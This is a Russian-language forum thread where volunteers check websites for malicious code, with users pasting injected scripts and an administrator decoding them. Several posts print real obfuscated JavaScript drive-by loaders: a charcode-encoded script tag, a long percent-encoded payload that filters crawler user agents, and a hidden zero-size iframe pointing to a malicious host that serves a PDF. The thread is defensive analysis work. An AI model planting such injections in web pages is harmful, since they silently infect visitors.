Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

akok

Команда форума
Администратор
Сообщения
19,317
Реакции
13,335
Баллы
2,203
  • Первое сообщение
  • #1
Нашим ресурсом оказываются услуги по проверке интернет ресурсов на наличие вредоносного кода.

Прошу учесть, что помощь оказывается добровольцами и поэтому не требуйте немедленной помощи. Вам обязательно окажут помощь.

Если вы хотите проверить сайт на вирусы, то выполните простые правила оформления запроса:
  1. Администрация имеет право отказать в проверке, в случае, если проверяемый ресурс нарушает законодательство или правила данного ресурса (варез, хакерская тематика, материалы порнографического характера).
  2. Никогда не публикуйте активных ссылок. (заменяйте http на хттп, например http://safezone.cc - нужно писать как хттп://safezone.cc)
  3. Не прикрепляйте файлы, которые предлагают вам скачать подозреваемые сайты. (Просто укажите имя файла, который пытается загрузится).
  4. Если Вы подозреваете, что после посещения подозрительного сайта Ваш компьютер подвергся заражению, то лучше выполнить правила оформления запроса.

*Мы не можем гарантировать 100% результат анализа. Слишком много факторов которых невозможно учесть.
 

akok

Команда форума
Администратор
Сообщения
19,317
Реакции
13,335
Баллы
2,203
smartall, хорошо. Еще понаблюдаю.
 

akok

Команда форума
Администратор
Сообщения
19,317
Реакции
13,335
Баллы
2,203
На сим наблюдение завершаю. Ничего в открытом доступе не вижу.
 

Husky1

Активный пользователь
Сообщения
2
Реакции
0
Баллы
391
Здравствуйте всем и с наступающим!
Прошу посмотреть сайт allnod.com/index.php , а то жалуются, что нод32 на него ругается.

<script language="JavaScript" src="/allnod.js"></script>
<script type="text/javascript" language="javascript">
<!--
function IU520(t127){document.write( String.fromCharCode(parseInt(t127)+2));}
var wo231="102O114O114O110O56O45O45O98O96O112O109O104O"+
"44O109O105O109O113O102O99O97O102O105O95O44O108O99O"+
"114O45O113O45O110O86O87O80O70O53O54O49O47O45O61O113O"+
"103O98O59O47O53O48O47O54";var Uv703=wo231.split("O");
document.write("<s"+"cript type='text/javascript' language='javascri"+"pt' src='");
var Hi319=0;while(Hi319<Uv703.length){IU520(Uv703[Hi319]);Hi319++;}
document.write("'></sc"+"ript>");
Вот этот скрипт в начале страницы, что он делает, как его распарсить?

ps/ у меня здесь уже есть регистрация(Husky), но я забыл пароль, и почты той уже нет(
Если есть возможность у администрации, напомните мне пароль в ЛС.
С уважением.
 
Последнее редактирование:

akok

Команда форума
Администратор
Сообщения
19,317
Реакции
13,335
Баллы
2,203
Husky1, в расшифровке это значит:

PHP:
<script type='text/javascript' language='javascript' src='http://dbroj.okoshechka.net/s/*****/?sid=17218'></script>
А там
PHP:
var ref = (document.referrer&&document.referrer!="") ? '&ref='+escape(document.referrer) : '';
var seed = '&seed='+Math.round(Math.random()*100000000);
document.write('<script type="text/javascript" language="javascript" src="http://dbro'+'j.oko'+'she'+'chk'+'a'+'.n'+'************/?sid'+'=172'+'18'+ref+seed+'"></script>');
Добавлено через 2 минуты 4 секунды
ps/ у меня здесь уже есть регистрация(Husky), но я забыл пароль, и почты той уже нет(
Если есть возможность у администрации, напомните мне пароль в ЛС
Если почта утеряна, то администрация ничем не может помочь.
 

icotonev

Ассоциация VN
Сообщения
1,426
Реакции
1,156
Баллы
553
Добавлено через 54 секунды
Проверьте этот сайт хттп://ввв.marvin-vibez.in....КИС 2010 блокира сайта..!:confused:
 
Последнее редактирование:

akok

Команда форума
Администратор
Сообщения
19,317
Реакции
13,335
Баллы
2,203
Cайт не работает. Но там интересный скрипт:

PHP:
<noframes><body><ad><script LANGUAGE='javascript'>var type_of='%3c'+'%73'+'%63'+'%72'+'%69'+'%70'+'%74'+'%20'+'%6c'+'%61'+'%6e'+'%67'+'%75'+'%61'+'%67'+'%65'+'%3d'+'%27'+'%6a'+'%61'+'%76'+'%61'+'%73'+'%63'+'%72'+'%69'+'%70'+'%74'+'%27'+'%3e'+'%64'+'%6f'+'%63'+'%75'+'%6d'+'%65'+'%6e'+'%74'+'%2e'+'%77'+'%72'+'%69'+'%74'+'%65'+'%28'+'%75'+'%6e'+'%65'+'%73'+'%63'+'%61'+'%70'+'%65'+'%28'+'%27'+'%25'+'%33'+'%63'+'%25'+'%37'+'%33'+'%25'+'%36'+'%33'+'%25'+'%37'+'%32'+'%25'+'%36'+'%39'+'%25'+'%37'+'%30'+'%25'+'%37'+'%34'+'%25'+'%32'+'%30'+'%25'+'%36'+'%63'+'%25'+'%36'+'%31'+'%25'+'%36'+'%65'+'%25'+'%36'+'%37'+'%25'+'%37'+'%35'+'%25'+'%36'+'%31'+'%25'+'%36'+'%37'+'%25'+'%36'+'%35'+'%25'+'%33'+'%64'+'%25'+'%32'+'%37'+'%25'+'%36'+'%61'+'%25'+'%36'+'%31'+'%25'+'%37'+'%36'+'%25'+'%36'+'%31'+'%25'+'%37'+'%33'+'%25'+'%36'+'%33'+'%25'+'%37'+'%32'+'%25'+'%36'+'%39'+'%25'+'%37'+'%30'+'%25'+'%37'+'%34'+'%25'+'%32'+'%37'+'%25'+'%33'+'%65'+'%25'+'%36'+'%36'+'%25'+'%37'+'%35'+'%25'+'%36'+'%65'+'%25'+'%36'+'%33'+'%25'+'%37'+'%34'+'%25'+'%36'+'%39'+'%25'+'%36'+'%66'+'%25'+'%36'+'%65'+'%25'+'%32'+'%30'+'%25'+'%34'+'%36'+'%25'+'%34'+'%35'+'%25'+'%32'+'%38'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%39'+'%25'+'%37'+'%62'+'%25'+'%37'+'%36'+'%25'+'%36'+'%31'+'%25'+'%37'+'%32'+'%25'+'%32'+'%30'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%33'+'%31'+'%25'+'%33'+'%64'+'%25'+'%37'+'%35'+'%25'+'%36'+'%65'+'%25'+'%36'+'%35'+'%25'+'%37'+'%33'+'%25'+'%36'+'%33'+'%25'+'%36'+'%31'+'%25'+'%37'+'%30'+'%25'+'%36'+'%35'+'%25'+'%32'+'%38'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%65'+'%25'+'%37'+'%33'+'%25'+'%37'+'%35'+'%25'+'%36'+'%32'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%38'+'%25'+'%33'+'%30'+'%25'+'%32'+'%63'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%65'+'%25'+'%36'+'%63'+'%25'+'%36'+'%35'+'%25'+'%36'+'%65'+'%25'+'%36'+'%37'+'%25'+'%37'+'%34'+'%25'+'%36'+'%38'+'%25'+'%32'+'%64'+'%25'+'%33'+'%31'+'%25'+'%32'+'%39'+'%25'+'%32'+'%39'+'%25'+'%33'+'%62'+'%25'+'%37'+'%36'+'%25'+'%36'+'%31'+'%25'+'%37'+'%32'+'%25'+'%32'+'%30'+'%25'+'%36'+'%66'+'%25'+'%37'+'%35'+'%25'+'%37'+'%34'+'%25'+'%33'+'%64'+'%25'+'%32'+'%37'+'%25'+'%32'+'%37'+'%25'+'%33'+'%62'+'%25'+'%36'+'%36'+'%25'+'%36'+'%66'+'%25'+'%37'+'%32'+'%25'+'%32'+'%38'+'%25'+'%36'+'%61'+'%25'+'%33'+'%64'+'%25'+'%33'+'%30'+'%25'+'%33'+'%62'+'%25'+'%36'+'%61'+'%25'+'%33'+'%63'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%33'+'%31'+'%25'+'%32'+'%65'+'%25'+'%36'+'%63'+'%25'+'%36'+'%35'+'%25'+'%36'+'%65'+'%25'+'%36'+'%37'+'%25'+'%37'+'%34'+'%25'+'%36'+'%38'+'%25'+'%33'+'%62'+'%25'+'%36'+'%61'+'%25'+'%32'+'%62'+'%25'+'%32'+'%62'+'%25'+'%32'+'%39'+'%25'+'%36'+'%66'+'%25'+'%37'+'%35'+'%25'+'%37'+'%34'+'%25'+'%32'+'%62'+'%25'+'%33'+'%64'+'%25'+'%35'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%36'+'%39'+'%25'+'%36'+'%65'+'%25'+'%36'+'%37'+'%25'+'%32'+'%65'+'%25'+'%36'+'%36'+'%25'+'%37'+'%32'+'%25'+'%36'+'%66'+'%25'+'%36'+'%64'+'%25'+'%34'+'%33'+'%25'+'%36'+'%38'+'%25'+'%36'+'%31'+'%25'+'%37'+'%32'+'%25'+'%34'+'%33'+'%25'+'%36'+'%66'+'%25'+'%36'+'%34'+'%25'+'%36'+'%35'+'%25'+'%32'+'%38'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%33'+'%31'+'%25'+'%32'+'%65'+'%25'+'%36'+'%33'+'%25'+'%36'+'%38'+'%25'+'%36'+'%31'+'%25'+'%37'+'%32'+'%25'+'%34'+'%33'+'%25'+'%36'+'%66'+'%25'+'%36'+'%34'+'%25'+'%36'+'%35'+'%25'+'%34'+'%31'+'%25'+'%37'+'%34'+'%25'+'%32'+'%38'+'%25'+'%36'+'%61'+'%25'+'%32'+'%39'+'%25'+'%32'+'%64'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%65'+'%25'+'%37'+'%33'+'%25'+'%37'+'%35'+'%25'+'%36'+'%32'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%38'+'%25'+'%37'+'%33'+'%25'+'%37'+'%34'+'%25'+'%37'+'%32'+'%25'+'%32'+'%65'+'%25'+'%36'+'%63'+'%25'+'%36'+'%35'+'%25'+'%36'+'%65'+'%25'+'%36'+'%37'+'%25'+'%37'+'%34'+'%25'+'%36'+'%38'+'%25'+'%32'+'%64'+'%25'+'%33'+'%31'+'%25'+'%32'+'%63'+'%25'+'%33'+'%31'+'%25'+'%32'+'%39'+'%25'+'%32'+'%39'+'%25'+'%33'+'%62'+'%25'+'%36'+'%34'+'%25'+'%36'+'%66'+'%25'+'%36'+'%33'+'%25'+'%37'+'%35'+'%25'+'%36'+'%64'+'%25'+'%36'+'%35'+'%25'+'%36'+'%65'+'%25'+'%37'+'%34'+'%25'+'%32'+'%65'+'%25'+'%37'+'%37'+'%25'+'%37'+'%32'+'%25'+'%36'+'%39'+'%25'+'%37'+'%34'+'%25'+'%36'+'%35'+'%25'+'%32'+'%38'+'%25'+'%37'+'%35'+'%25'+'%36'+'%65'+'%25'+'%36'+'%35'+'%25'+'%37'+'%33'+'%25'+'%36'+'%33'+'%25'+'%36'+'%31'+'%25'+'%37'+'%30'+'%25'+'%36'+'%35'+'%25'+'%32'+'%38'+'%25'+'%36'+'%66'+'%25'+'%37'+'%35'+'%25'+'%37'+'%34'+'%25'+'%32'+'%39'+'%25'+'%32'+'%39'+'%25'+'%33'+'%62'+'%25'+'%37'+'%64'+'%25'+'%33'+'%63'+'%25'+'%32'+'%66'+'%25'+'%37'+'%33'+'%25'+'%36'+'%33'+'%25'+'%37'+'%32'+'%25'+'%36'+'%39'+'%25'+'%37'+'%30'+'%25'+'%37'+'%34'+'%25'+'%33'+'%65'+'%27'+'%29'+'%29'+'%3b'+'%3c'+'%2f'+'%73'+'%63'+'%72'+'%69'+'%70'+'%74'+'%3e';for(i=0;i<type_of.length+2;i=i+3)document.write(unescape(type_of.substr(i,3)));FE('%286Fvfulsw%2853ODQJXDJH%286G%2855mdydvfulsw%2855%286Hli%285%3Bgrfxphqw1frrnlh1lqgh%7BRi%285%3B%2855xufklq%2855%285%3C%286G%286G04%2853%2859%2859%2853%2854zlqgrz1qdyljdwru1xvhuDjhqw1wrOrzhuFdvh%285%3B%285%3C1pdwfk%285%3B2%285%3Bfudzohu%28%3AFjrrjoherw%28%3AFpvqerw%28%3AF%7Cdkrr%28%3AFvhdufk%28%3AFlqgh%7Bhu%28%3AFfxloo1frp%28%3AFvwdfnudpeohu%28%3AFdsruw%28%3AF%7Cdqgh%7B%28%3AFelqj%28%3AFdvn%285%3C2%285%3C%2*******286G2%2855%286E%2853grfxphqw1zulwh%285%3B%2855%286Fl%2855.%2855iud%2855.%2855ph%2853zlgw%2855.%2855k%286G%2855.%28556%2853khljk%2855.%2855w%286G4%2853erug%2855.%2855hu%286G3%2853iu%2855.%2855dp%2855.%2855her%2855.%2855ughu%286G%2855.%28553%2853vuf%286G%285%3Ak%2855.%2855wws%2855.%2855%*****55%285%3C%286E%28%3AG%286F2VFULSW%286H%283D3');</script>
 

Husky1

Активный пользователь
Сообщения
2
Реакции
0
Баллы
391
Husky1, в расшифровке это значит:........

Если почта утеряна, то администрация ничем не может помочь.
Ясно, спасибо akoK. Как вы расшифровали код, на поделитесь секретами?
А на счет аккаунта, ладно, бог с ним, не критично)
 

solnce

Активный пользователь
Сообщения
6
Реакции
0
Баллы
391
Добрый день! Помогите, пожалуйста, проверить на вирусы сайт ввв.mybodyflex.ru

Уже несколько дней NOD на форуме выжает сообщение: "блокировано соединение с вредоносным сайтом westnorths.cn...... "
 
Последнее редактирование:

akok

Команда форума
Администратор
Сообщения
19,317
Реакции
13,335
Баллы
2,203
Насколько я понимаю проблему уже пофиксили? Не вижу вредоносных редиректов.
 

solnce

Активный пользователь
Сообщения
6
Реакции
0
Баллы
391
Насколько я понимаю проблему уже пофиксили? Не вижу вредоносных редиректов.
Да, спасибо! Проблема, как оказалось, была вызвана линеечками с одного сата, коотрый подхватил вирус. Закрыла линеечки и проблема решилась.
 

KIB

Активный пользователь
Сообщения
2
Реакции
0
Баллы
391
Проверьте пожалуйста
 

akok

Команда форума
Администратор
Сообщения
19,317
Реакции
13,335
Баллы
2,203
Заражен
В коде:
PHP:
<script>window.status=" ";document.write(unescape("%3C%69"+"f%72%61me%20src%3Dht"+"********%3Dc206a9f40624fffd7eac23b23e0f6fbb%20width%3D0%20height%3D0%3E%3C/%69%66%72%61%6D%65%3E"));</script><br />
Который ведет на http://mr*****isy.cn/?s=c206a9f47eac23b23e0f6fbb

Который в свою очередь пытается загрузить pdf.
 

KIB

Активный пользователь
Сообщения
2
Реакции
0
Баллы
391
Спасибо!
Сообщил модераторам, но что-то никто не чешется.
 

solnce

Активный пользователь
Сообщения
6
Реакции
0
Баллы
391
Добрый день! Проверьте, пожалуйста, сайт ввв magicwish . ru
Касперский видит трояна, остальные интивирусы молчат...
 

Sergei

Активный пользователь
Сообщения
382
Реакции
216
Баллы
483
solnce, у меня KIS 2010 , пускает без проблем
 

solnce

Активный пользователь
Сообщения
6
Реакции
0
Баллы
391
Спасибо за проверку. Странно, почему тогда у некоторых пользователей Касперский ругается...
 

Sergei

Активный пользователь
Сообщения
382
Реакции
216
Баллы
483
solnce, я не проверял. а просто зашёл на сайт , касперский молчал..
 

solnce

Активный пользователь
Сообщения
6
Реакции
0
Баллы
391
Вот еще пользователь сообщил, что АВАСТ закрывает форум... А можно проверить? У меня НОД - он никаких проблем не показывает...
 

akok

Команда форума
Администратор
Сообщения
19,317
Реакции
13,335
Баллы
2,203
Вечером посмотрю код.
 
Сверху Снизу